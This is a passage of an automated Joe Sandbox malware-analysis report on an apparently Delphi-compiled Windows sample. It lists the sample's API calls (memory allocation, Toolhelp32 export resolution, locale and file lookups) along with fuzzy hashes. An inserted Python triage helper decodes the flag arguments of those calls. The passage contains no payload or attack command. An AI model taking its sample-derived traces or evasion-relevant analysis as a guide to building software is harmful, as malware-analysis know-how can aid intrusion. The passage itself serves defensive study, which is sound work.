                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: ed1e4bf7f4dfea21596e598c36f5a73c725b628a79c1b7dbb49e0bc2d79c6c96
                                                                                                                • Instruction ID: 67f75938cc8995733c9a3eacd0a806b903c324538b6d1e1ecf9a8f0180a966e9
                                                                                                                • Opcode Fuzzy Hash: ed1e4bf7f4dfea21596e598c36f5a73c725b628a79c1b7dbb49e0bc2d79c6c96
                                                                                                                • Instruction Fuzzy Hash: 51F031F4B413044FDB05DFB99940705BAE6E78A384F20857DD609EB384E7B584128B00
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02EC1FC1), ref: 02EC16A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 9d9c3c15b457fe2a8aa6b32e423e1891741a0579f2c2e8f750a927ae0ef90c24
                                                                                                                • Instruction ID: d3c08575459abd802023e7ddce543a0caf998f32b47a18dbef04cd6282348e07
                                                                                                                • Opcode Fuzzy Hash: 9d9c3c15b457fe2a8aa6b32e423e1891741a0579f2c2e8f750a927ae0ef90c24
                                                                                                                • Instruction Fuzzy Hash: 08F024B6B407986BD710DF8A9C80B82FBD8FB15354F104139FA0CDB340CBB0A8108B94
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02EC1FE4), ref: 02EC1704
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 5d2a76e6790dcf207813940990b72fd48e7d360a570c2198eb6815bf262b145e
                                                                                                                • Instruction ID: ad74231b13ba3dca2f973c1198886afed56a0ca8c2b51bb8c4851e0fea2e1445
                                                                                                                • Opcode Fuzzy Hash: 5d2a76e6790dcf207813940990b72fd48e7d360a570c2198eb6815bf262b145e
                                                                                                                • Instruction Fuzzy Hash: ADE086793403016FD7105AB95E40B52BBDCEB55654F349479F50DDF242D6A0E8128B60
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02EDADA3,?,?,02EDAE35,00000000,02EDAF11), ref: 02EDAB30
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02EDAB48
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02EDAB5A
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02EDAB6C
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02EDAB7E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02EDAB90
                                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02EDABA2
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02EDABB4
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02EDABC6
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02EDABD8
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02EDABEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02EDABFC
                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02EDAC0E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02EDAC20
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02EDAC32
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02EDAC44
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02EDAC56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                • API String ID: 667068680-597814768
                                                                                                                • Opcode ID: 6fa1289e8470c0183abd50d974a4bee51ae1fec43b649518229573499b953a31
                                                                                                                • Instruction ID: f151b7df8162fa152c5992ecc5cbd75da7c97dba37192007b9b61e99c6629eee
                                                                                                                • Opcode Fuzzy Hash: 6fa1289e8470c0183abd50d974a4bee51ae1fec43b649518229573499b953a31
                                                                                                                • Instruction Fuzzy Hash: 77310EB4AC02549FEF10FFB49984A2AB3E8AF56251710AD75B401CF304E7B4A552CF12
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5925
                                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02EC593C
                                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02EC596C
                                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC59D0
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A06
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A19
                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A2B
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A37
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000), ref: 02EC5A6B
                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14), ref: 02EC5A77
                                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02EC5A99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                • Opcode ID: 601a8a0ae9b361dd454e14d0fc449c82c852ff908bb74d4bcfb38ec73b96c684
                                                                                                                • Instruction ID: 844209abe0d4f179a4976b9875320fbc05d059987a0854ee310a31b94c583e96
                                                                                                                • Opcode Fuzzy Hash: 601a8a0ae9b361dd454e14d0fc449c82c852ff908bb74d4bcfb38ec73b96c684
                                                                                                                • Instruction Fuzzy Hash: F4418371D80219AFDB10DEE8CE88ADEB3BDAF04344F6495A9E158E7241D770EE458F50
                                                                                                                APIs
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EC5BE8
                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EC5BF5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EC5BFB
                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EC5C26
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5C6D
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5C7D
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5CA5
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5CB5
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EC5CDB
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EC5CEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                • API String ID: 1599918012-2375825460
                                                                                                                • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                • Instruction ID: 34a51e0ebb2095220e6dbf06ac751cc4b29d5f49e69651d5d98d3bb1d5997e85
                                                                                                                • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                • Instruction Fuzzy Hash: D2310971E8021C29EB25C6F4CD45FDFB7AD8B00384F6091A9B608F6181D774DE468F50
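                                                                                                                The API listings above (the VirtualAlloc/VirtualFree calls at 02EC15E2, 02EC16A4 and 02EC1704, the GetProcAddress chain at 02EDAB30, and the Software\Borland\...\Locales lookups) read more easily once the numeric arguments are decoded. The Python below is an added triage helper written for this report page, not Joe Sandbox code and not part of the sample: it parses these API lines, decodes the flag arguments against the documented winnt.h/winbase.h constants, and recognises that the 16-export GetProcAddress sequence is the initialization section of the Delphi RTL's TlHelp32 unit, so that function indicates a Delphi-compiled binary rather than a hand-written process-enumeration routine. All function names and the SAMPLE_FUNCTIONS table are this example's own; the sample lines are copied from the report blocks above, with the 16 GetProcAddress lines regenerated from their 0x12-byte ref stride.

```python
"""Triage helper for the per-function "APIs" lines of a Joe Sandbox report.

Added example for this report page; it is not Joe Sandbox code and the
function and constant names are this example's own. It parses lines of the
form "<Api>.<Module>(<arg>,...), ref: <addr>", decodes the flag arguments of
VirtualAlloc/VirtualFree/LoadLibraryExA, and recognises the GetProcAddress
sequence that the Delphi RTL's TlHelp32 unit emits at unit initialization.
"""
import re
from dataclasses import dataclass

# winnt.h / winbase.h constants used by the calls decoded below.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN"}
PAGE_FLAGS = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
LOAD_FLAGS = {0x02: "LOAD_LIBRARY_AS_DATAFILE", 0x08: "LOAD_WITH_ALTERED_SEARCH_PATH"}

# The 16 exports Delphi's TlHelp32 unit resolves in its initialization section,
# in the order the unit resolves them (the same order as the function at 02EDAB30).
DELPHI_TLHELP32 = (
    "CreateToolhelp32Snapshot", "Heap32ListFirst", "Heap32ListNext", "Heap32First",
    "Heap32Next", "Toolhelp32ReadProcessMemory", "Process32First", "Process32Next",
    "Process32FirstW", "Process32NextW", "Thread32First", "Thread32Next",
    "Module32First", "Module32Next", "Module32FirstW", "Module32NextW",
)

# "• VirtualAlloc.KERNEL32(00000000,00140000,...), ref: 02EC15E2"
API_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_api_line(line: str):
    """Parse one report API line; return None for lines that are not API calls."""
    m = API_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16))


def decode_flags(value: int, table: dict) -> str:
    """Render a bit-flag argument as OR-ed constant names; bits the table lacks stay hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def _flags(arg: str, table: dict) -> str:
    # The tracer prints "?" for arguments it could not recover; keep that visible.
    return "?" if arg == "?" else decode_flags(int(arg, 16), table)


def describe(call: ApiCall) -> str:
    """One-line decode for the calls whose flag arguments matter in triage."""
    a = call.args
    if call.api == "VirtualAlloc" and len(a) >= 4:
        size = "?" if a[1] == "?" else f"0x{int(a[1], 16):X}"
        return f"VirtualAlloc size={size} type={_flags(a[2], MEM_FLAGS)} protect={_flags(a[3], PAGE_FLAGS)}"
    if call.api == "VirtualFree" and len(a) >= 3:
        return f"VirtualFree type={_flags(a[2], MEM_FLAGS)}"
    if call.api == "LoadLibraryExA" and len(a) >= 3:
        return f"LoadLibraryExA flags={_flags(a[2], LOAD_FLAGS)}"
    return ""


def triage(lines) -> list:
    """Findings for one function's API lines: RTL patterns first, then decoded calls."""
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    findings = []
    resolved = [c.args[1] for c in calls if c.api == "GetProcAddress" and len(c.args) >= 2]
    if set(DELPHI_TLHELP32) <= set(resolved):
        findings.append("Delphi TlHelp32 unit initialization (RTL code, not a custom enumeration routine)")
    elif set(resolved) & set(DELPHI_TLHELP32):
        findings.append("resolves Toolhelp32 exports: " + ", ".join(n for n in resolved if n in DELPHI_TLHELP32))
    if any("Software\\Borland\\" in arg for c in calls for arg in c.args):
        findings.append("Delphi RTL resource-module lookup (Software\\Borland\\...\\Locales)")
    findings.extend(d for d in map(describe, calls) if d)
    return findings


def triage_report(functions: dict) -> dict:
    """Map each function ref to its findings."""
    return {ref: triage(lines) for ref, lines in functions.items()}


# Sample input: API lines copied from the report's function blocks above
# (the GetProcAddress lines are regenerated from their 0x12-byte ref stride).
SAMPLE_FUNCTIONS = {
    "02EC15E2": ["• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02EC1A03,?,02EC1FC1), ref: 02EC15E2"],
    "02EC16A4": ["• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02EC1FC1), ref: 02EC16A4"],
    "02EC1704": ["• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02EC1FE4), ref: 02EC1704"],
    "02EDAB30": ["• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02EDADA3,?,?,02EDAE35,00000000,02EDAF11), ref: 02EDAB30"]
                + [f"• GetProcAddress.KERNEL32(00000000,{name}), ref: {0x02EDAB48 + 0x12 * i:08X}"
                   for i, name in enumerate(DELPHI_TLHELP32)],
    "02EC5C7D": [r"• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5C7D"],
}

if __name__ == "__main__":
    for ref, findings in triage_report(SAMPLE_FUNCTIONS).items():
        print(ref)
        for finding in findings:
            print("   ", finding)
```

Both VirtualAlloc calls decode to PAGE_READWRITE with MEM_COMMIT (the second one also MEM_TOP_DOWN), not PAGE_EXECUTE_READWRITE, so on their own these are ordinary buffer allocations; decoding the protection argument is what separates them from the RWX allocations that deserve a closer look. Likewise the LoadLibraryExA calls carry LOAD_LIBRARY_AS_DATAFILE, the flag the Delphi RTL uses when probing for a localized resource module, which is consistent with the Software\Borland\...\Locales registry strings in the same function.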
                                                                                                                APIs
                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02EC7FF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1705453755-0
                                                                                                                • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                • Instruction ID: 3e40fb6a4ca98a0fd192e49ced7f4c5e10978cd408c13ffc7267a29a40864cc9
                                                                                                                • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                • Instruction Fuzzy Hash: 431100B5A00209AF9B00CF99C981DEFF7F9FFC9300B64C559A404E7254E671AA018B90
                                                                                                                APIs
                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                • Instruction ID: a523a80a186f04f10154ba4c9248c00976ee56c2eff433bed4d2e05d83c00049
                                                                                                                • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                • Instruction Fuzzy Hash: 7DE0927274421817D311A9989E84EEA725D9758310F10927EB905C7385EDB09E814AE4
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32(?,02EED106,00000000,02EED11E), ref: 02ECB79A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                • Opcode ID: d2876b9a1a4a3fefbc981ffbb49526b5c3938462b7f7781311031153a5967eb5
                                                                                                                • Instruction ID: 65e2a740208959c8e9c0578e3562b4d118974653cf05cfb9796d269da9f673a4
                                                                                                                • Opcode Fuzzy Hash: d2876b9a1a4a3fefbc981ffbb49526b5c3938462b7f7781311031153a5967eb5
                                                                                                                • Instruction Fuzzy Hash: 26F0E274984301CFD740DF6AD54361677E9FB88624F989D2CFA988B380E7349495CB52
                                                                                                                APIs
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02ECBE72,00000000,02ECC08B,?,?,00000000,00000000), ref: 02ECA823
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                • Instruction ID: 20276448f7ae862233b986b6e20d6a14c2920609139787deccdd9e37cf0cc92f
                                                                                                                • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                • Instruction Fuzzy Hash: B2D05BA334E1542AA210559A2E44D7B5ADCCAC5765F10903DB948C6301D210CC07D6B1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 481472006-0
                                                                                                                • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                • Instruction ID: 9e48bd7729f3347e79b37422eace040c189afc553187385fa5332c94e778505f
                                                                                                                • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                • Instruction Fuzzy Hash: BEA0128044482041854033180C0253930445C50A20FD4C74478F8402D0E92D41208093
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
